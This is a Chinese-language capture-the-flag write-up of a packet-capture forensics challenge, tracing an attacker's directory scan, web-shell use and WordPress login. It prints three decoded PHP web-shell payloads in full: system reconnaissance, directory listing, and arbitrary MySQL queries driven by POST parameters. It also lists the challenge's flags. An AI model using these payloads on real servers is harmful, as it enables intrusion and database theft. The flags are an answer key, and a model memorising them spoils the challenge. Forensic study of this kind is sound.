套的签到题
打开先用http协议过滤一下
发现在同一时间访问多个目录
可能是在目录扫描
给他扫到了secret.zip
看看是什么
用010打开
删除多余部分
得到一堆php文件
flag1
然后继续返回小鲨鱼看看
一直在a.php这里穿参
打开他的脚本
url解密一下
一步一步看看他在干啥
<?php
// 禁止显示 PHP 错误信息
@ini_set("display_errors", "0");
// 设置脚本执行时间限制为无限制
@set_time_limit(0);
// 定义一个简单的函数,不对传入的参数进行任何加密或编码操作
function asenc($out){
return $out;
}
// 定义另一个函数,用于获取输出缓冲区中的内容并进行处理后输出
function asoutput(){
// 获取输出缓冲区中的内容
$output = ob_get_contents();
ob_end_clean(); // 清空输出缓冲区
// 输出处理后的内容
echo "81c89"; // 输出前缀
echo @asenc($output); // 输出经过处理的内容(调用 asenc 函数)
echo "292e6ed50f"; // 输出后缀
}
// 开始输出缓冲区,将后续输出的内容先缓存起来
ob_start();
try {
// 获取服务器和环境的信息
$D = dirname($_SERVER["SCRIPT_FILENAME"]);
if ($D == "")
$D = dirname($_SERVER["PATH_TRANSLATED"]);
$R = "{$D} "; // 服务器路径
if (substr($D, 0, 1) != "/") {
foreach (range("C", "Z") as $L) {
if (is_dir("{$L}:")) {
$R .= "{$L}:"; // Windows 盘符
}
}
} else {
$R .= "/"; // Linux 根路径
}
$R .= " ";
// 获取当前用户信息
$u = (function_exists("posix_getegid")) ? @posix_getpwuid(@posix_geteuid()) : "";
$s = ($u) ? $u["name"] : @get_current_user();
// 将服务器信息、操作系统信息、当前用户信息拼接到一起
$R .= php_uname(); // 操作系统信息
$R .= " {$s}";
// 输出获取到的信息
echo $R;
} catch (Exception $e) {
// 如果有异常,输出错误信息
echo "ERROR://" . $e->getMessage();
}
// 处理并输出获取到的信息
asoutput();
// 终止脚本的执行
die();
?>
读取服务区 操作系统 当前用户信息
<?php
// 禁止显示 PHP 错误信息
$mumuzi = @ini_set("display_errors", "0");
// 设置脚本执行时间限制为无限制
@set_time_limit(0);
// 定义一个简单的函数,不对传入的参数进行任何加密或编码操作
function asenc($out){
return $out;
}
// 定义另一个函数,用于获取输出缓冲区中的内容并进行处理后输出
function asoutput(){
// 获取输出缓冲区中的内容
$output = ob_get_contents();
ob_end_clean(); // 清空输出缓冲区
// 输出处理后的内容
echo "8ae19f4d6a0e"; // 输出前缀
echo @asenc($output); // 输出经过处理的内容(调用 asenc 函数)
echo "e5fb750541"; // 输出后缀
}
// 开始输出缓冲区,将后续输出的内容先缓存起来
ob_start();
try {
// 解码 POST 请求中的参数,获取目录路径
$D = base64_decode(substr($_POST["w1e23a5b202d16"], 2));
$F = @opendir($D); // 打开目录句柄
// 如果目录不存在或无权限,则输出错误信息
if ($F == NULL) {
echo("ERROR:// Path Not Found Or No Permission!");
} else {
$M = NULL; // 存储子目录信息
$L = NULL; // 存储文件信息
// 遍历目录中的文件和子目录
while ($N = @readdir($F)) {
$P = $D . $N; // 文件或子目录的完整路径
$T = @date("Y-m-d H:i:s", @filemtime($P)); // 文件或子目录的修改时间
@$E = substr(base_convert(@fileperms($P), 10, 8), -4); // 文件或子目录的权限
$R = " " . $T . " " . @filesize($P) . " " . $E . "
"; // 构建文件或子目录的信息
// 如果是子目录,将信息存储到 $M 中
if (@is_dir($P))
$M .= $N . "/" . $R;
// 如果是文件,将信息存储到 $L 中
else
$L .= $N . $R;
}
// 输出子目录信息和文件信息
echo $M . $L;
@closedir($F); // 关闭目录句柄
}
} catch (Exception $e) {
// 如果有异常,输出错误信息
echo "ERROR://" . $e->getMessage();
}
// 处理并输出获取到的信息
asoutput();
// 终止脚本的执行
die();
?>
读取文件
一步一步的
也是读到我们家flag了
base64解码一下
得到第一段flag
注意这里是脚本里加的前缀
p4rt1_y00_you_crack_my_wpweb
flag2
继续往下看
同样的翻译脚本
<?php
// 定义数据库相关的一些信息
$ba78d60a6b259c = "utf8"; // 字符集
$efad7905bff72d = "wordpress"; // 数据库名
// 禁止显示 PHP 错误信息
$mumuzi = @ini_set("display_errors", "0");
// 设置脚本执行时间限制为无限制
@set_time_limit(0);
// 定义一个简单的函数,不对传入的参数进行任何加密或编码操作
function asenc($out){
return $out;
}
// 定义另一个函数,用于获取输出缓冲区中的内容并进行处理后输出
function asoutput(){
// 获取输出缓冲区中的内容
$output = ob_get_contents();
ob_end_clean(); // 清空输出缓冲区
// 输出处理后的内容
echo "5ab71b5d25dc"; // 输出前缀
echo @asenc($output); // 输出经过处理的内容(调用 asenc 函数)
echo "55faf75fe7c2"; // 输出后缀
}
// 开始输出缓冲区,将后续输出的内容先缓存起来
ob_start();
try {
// 检查是否启用了 Magic Quotes GPC
$m = get_magic_quotes_gpc();
// 获取 POST 请求中的参数
$hst = $m ? stripslashes($_POST["ze9a61efed8a8e"]) : $_POST["ze9a61efed8a8e"]; // 主机
$usr = $m ? stripslashes($_POST["q5d8f0d64504b2"]) : $_POST["q5d8f0d64504b2"]; // 用户名
$pwd = $m ? stripslashes($_POST["vd4276a0d86cf7"]) : $_POST["vd4276a0d86cf7"]; // 密码
$dbn = $m ? stripslashes($_POST["efad7905bff72d"]) : $_POST["efad7905bff72d"]; // 数据库名
$sql = base64_decode($_POST["n5a24bdf78868b"]); // SQL 查询语句
// 解析主机和端口
$port = explode(":", $hst)[1]; // 端口
$hst = explode(":", $hst)[0]; // 主机
// 连接数据库服务器
$T = @mysqli_connect($hst, $usr, $pwd, "", $port);
@mysqli_query($T, "SET NAMES $_POST[ba78d60a6b259c]"); // 设置字符集
@mysqli_select_db($T, $dbn); // 选择数据库
// 执行 SQL 查询
$q = @mysqli_query($T, $sql);
// 检查查询结果是否为布尔值
if (is_bool($q)) {
echo ("Status\t|\t" . ($q ? "True" : "False") . "\t|\t\n"); // 输出查询状态
} else {
$i = 0;
while ($col = @mysqli_fetch_field($q)) {
echo ($col->name . "\t|\t"); // 输出列名
$i++;
}
echo ("\n");
while ($rs = @mysqli_fetch_row($q)) {
for ($c = 0; $c < $i; $c++) {
echo (base64_encode(trim($rs[$c]))); // 输出查询结果(经过 base64 编码)
echo ("\t|\t");
}
echo ("\n");
}
}
@mysqli_close($T); // 关闭数据库连接
} catch (Exception $e) {
// 如果有异常,输出错误信息
echo "ERROR://" . $e->getMessage();
}
// 处理并输出获取到的信息
asoutput();
// 终止脚本的执行
die();
?>
他在读取数据库的内容
找啊找
也是找到我们家flag了
now_you_can_submit_flag2
flag3
然后往下翻
发现他一直在尝试登陆login.php
最后也是给我们家hacker登陆进去了
然后在后面他post的文件里面找到了内容就是flag3